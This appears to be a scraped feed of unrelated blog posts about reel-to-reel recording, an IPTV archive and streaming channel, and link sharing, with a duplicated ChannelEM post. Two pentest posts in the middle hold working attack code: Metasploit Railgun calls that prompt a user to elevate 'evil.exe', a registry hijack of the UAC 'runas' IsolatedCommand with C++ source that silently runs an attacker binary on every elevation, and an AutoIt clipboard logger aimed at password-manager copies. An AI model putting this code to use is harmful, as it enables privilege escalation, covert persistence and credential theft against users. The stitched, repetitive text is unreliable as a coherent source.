As I said a few weeks ago, things are going on Archive.org. If you would like to follow my progress (and download lots of files more easily) check this page out often.
~Famicoman
I have a handful of reel-to-reel players. As an extension of this, I also happen to have around fifty or so reels to accompany the players. For the past few years, they haven’t been doing much besides serving as over-sized paper weights. Over the past couple months though, I have been recording things on to them. Music to be specific, all sorts of music.
I’ve been recording whole albums onto the reels of quarter inch magnetic tape. At 7.5 inches per second, the quality is pretty much indistinguishable from the MP3 player I record them from. At 45 minutes per side of tape, I can put at least one album per side (in most cases).
Why do all this? I like the process. It can be a bit of relaxation to string up a tape on a machine and hit the play button, watching the reels hit tension and hearing the music wind up. Also, it’s not the easiest thing to find pre-recorded music on reels. You can most likely find some jazz or easy listening albums on tape, but rock-oriented music is hard to get and can fetch a high price if you are lucky enough to locate it. As more collectors get at the harder-to-find tapes, recording yourself is pretty much the best way to go if you want your equipment used for anything other than show.
Via Famicoman from Famicoman.com
Via Moonlit from The Moonlit Code
Via Moonlit from The Moonlit Code
I know, I know, I suck at updating stuff. While you all wait for my new album, here’s a halloween bonus track.
Via Moonlit from The Moonlit Code
A number of times during tests I’ve actually run into those mythical creatures called “patched windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute windows function via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:
client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],]) client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)
This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.exe’ with Administrative privs. If they are not “Admins” themselves then it would prompt them for the user name and password (normally the case in systems attached to domains). Something to be aware of: If your evil.exe is not code-signed the UAC box will be orange instead of blue. You can get around this a bit by using rundll32.exe (which is signed 
) as is svchost.exe. (You may also want to not name it evil.exe)
The downfall here is that 1. You have to drop a binary (boooo) 2. You are prompting the user for UAC control when they didn’t do anything to cause it. Users are generally as smart as bait, but it’s good practice to assume to the contrary. If for nothing else other than to challenge yourself to up your game.
Number 1 I’ll leave to another post, so lets solve #2.
When a “runas” ShellExecute (which UAC runs natively #hint#hint) a few registry locations are checked. One I’d like to point out is the HKLM\Software\Classes\exefile key. The ‘exefile’ as should be obvious is the registry settings for executables, and as such tells Windows how to interact with them. In HKLM (which is only writable by Administrators) the “shell\open”, “shell\runas” and “shell\runasuser” subkeys exist (the structure looks oddly familiar to anyone who visited the ShellExecute page more than once). Inside “shell\open\command” the default string has “%1″ %* - this basically means execute the binary %1 and hand the arguments given directly to it %*. Awesome! From here you can alter how every EXE runs on the system (don’t do it, Windows doesn’t like you afterwards, trust me, and remember to snapshot if you don’t).
Great, but how does this help us, we aren’t admins. HKCU is writable by the ‘Current User’ hence the name, and it so happens to have a very similar registry path: HKCU\Software\Classes. Depending on your system, it may or may not have a “exefile” subkey. If it doesn’t it’s pretty easy to create. Lets make it match the “runas” one in HKLM
The tree should look something like this when you are done:
Under command change the default value to “%1″ %* just as it is in HKLM, and add a new String value called ‘IsolatedCommand’ with the same value as default. With these settings, very little has changed on the system or its operation. However, if we change the ‘IsolatedCommand’ String to ‘notepad.exe’ and attempt to ‘Run As Administrator’ on that system using any binary guess what happens? Notepad! (as Admin). w00t. Now we can swap in our evil.exe and bob wins right? Sorta. We still have that horrible problem of stealth. Whatever the user was trying to UAC up won’t work, and they’ll try it again, and start investigating the problem, which we don’t want them to do.
Enter ‘runyou.exe’, it’s some very simple C++ that weighs in at a whopping 8k when compiled (probably could loose some weight by those who know better compiler options):
#include "windows.h"
#include "stdio.h"
#include "tchar.h"
int _tmain(int argc, _TCHAR* argv[])
{
if (argv[1])
{
ShellExecuteW(NULL,NULL,argv[1],NULL,NULL,SW_SHOW);
if (argv[2])
{
ShellExecuteW(NULL,NULL,argv[2],NULL,NULL,SW_HIDE);
}
}
return 0;
}
This code executes the first program visibly and then the second hidden. You probably see where this is going, but we change our IsolatedCommand String to runyou.exe %1 evil.exe and now we give them exactly what they want in an elevated state, but also get our evil binary there too
The very real down side to this is you have to wait for the user to use UAC (this does not work if someone else does, it’s only for the current user HKCU). But, as a side benefit, it’s a very real form of sneaky persistence as well, as it will execute our evil binary every single time they use UAC.
Game Over…
Via Mubix from Room362.com
Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early:
#include <Clipboard.au3>
#include <File.au3>
$oldclip = ""
While 1
$clip = _ClipBoard_GetData()
If $clip <> "0" Then
If $clip <> $oldclip Then
_FileWriteLog(@UserProfileDir & "\clip.log", $clip)
$oldclip = $clip
EndIf
EndIf
Sleep(100)
WEnd
It’s pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).
(Think KeePass, 1Password, LastPass…)
Via Mubix from Room362.com
When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked. I’ve found Tumblr to be not a very good substitue for Google Reader’s functionality (IMHO).
The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.
I know what you’re thinking, cool, but no big deal right? It goes to twitter, and not to a feed that someone can subscribe to. You’re right, and I fought all day trying to figure that part out and finally came up with a twitter search for my tweets and a special hashtag I would use for my shared links. I found the RSS feed for that search and it looks like this:
http://search.twitter.com/search.atom?q=from%3Amubix%20%23SharedLinks
obviously, this isn’t the easiest or pretty link to send around, so instead I pumped that into Feedburner and now have this for a feed link:
http://feeds.feedburner.com/MubixLinks
Much easier to share, with one AMAZING added bonus. I can switch the feed that powers it at any time, so from now on, no matter if I use Tumblr or Google Reader (after they unjack themselves) or G+ (if they finally set up a feed for +1’d items), that will always be the link to items that I’ve personally liked and wanted to share.
I encourage you to do the same, and leave a comment, so that I can follow your feed back!
Oh, and sign up for Buffer here (w/ my referal link http://bufferapp.com/r/7e450
Via Mubix from Room362.com
Since the beginning of the IPTV Archive, both Moonlit and I had an idea for a video stream that could play IPTV all day. Similar to an actual television station in theory, and RantTV in practice, we set off to work on it. Initial trials were difficult to say anything. We worked on server side playlists, linking into streaming video sites, having out own flash based platform, transcoding files on the fly to a streaming website, and other methods that never seemed to work. We always had the time to invest, but never enough resources. We didn’t have the money for a dedicated icecast box, or a beefy machine that could just transcode and stream all day. Throughout the years, we’ve had this project going on under one name or another. It started as just something we kicked around to each other, than as a little archive side project, then it was attached to another group, and now it has taken own it’s own presence.
ChannelEM officially came into being last month, and has been functioning smoothly ever since. The project is a culmination of the efforts of Moonlit, Pat, and myself and will hopefully be around a while to grow and expand. ChannelEM in a nutshell is an IPTV network in the developing stages. While we aim to keep a steady 24/7 stream of independent video, we would also like to expand and reach out to those who run their own shows and would like some exposure to a like-minded community. If that seems up your alley, feel free to give it a look.
Moving on to other news, you may have noticed that there have been few updates (with the exception of last week) to the archive in general. That said, I’ve been working on a few other things, and have few shows that need the archival treatment as of right now. In the midst of other projects, and saturating my download with hacker convention videos, I’ve decided to take a step I have been mentioning for a while and am starting the Archive.org phase of this archive. That means over the next few weeks or so, I’ll be transferring my stash of shows onto Archive.org, where it will be safe for years to come. If something ever happens to blip.tv or my hard drives all decide to take a dive one day, the episodes will be in the safe hands of the Internet Archive.
That said, if you have anything to contribute to the archive, or just want to chat about any of these things in general, feel free to exercise the contact and chat pages over to your left and let me know what is on your mind.
~Famicoman
Since starting the IPTV Archive, both Moonlit and I had an idea for a video stream that could play IPTV all day. Similar to an actual television station in theory, and RantTV in practice, we set off to work on it. Initial trials were difficult to say anything. We worked on server side playlists, linking into streaming video sites, having out own flash based platform, transcoding files on the fly to a streaming website, and other methods that never seemed to work. We always had the time to invest, but never enough resources. We didn’t have the money for a dedicated icecast box, or a beefy machine that could just transcode and stream all day.
Throughout the years, we’ve had this project going on under one name or another. It started as just something we kicked around to each other, than as a little archive side project, then it was attached to another group, and now it has taken own it’s own presence.
ChannelEM officially came into being last month, and has been functioning smoothly ever since. The project is a culmination of the efforts of Moonlit, Pat, and myself and will hopefully be around a while to grow and expand. ChannelEM in a nutshell is an IPTV network in the developing stages. While we aim to keep a steady 24/7 stream of independent video, we would also like to expand and reach out to those who run their own shows and would like some exposure to a like-minded community. If that seems up your alley, feel free to give it a look.
Via Famicoman from Famicoman.com
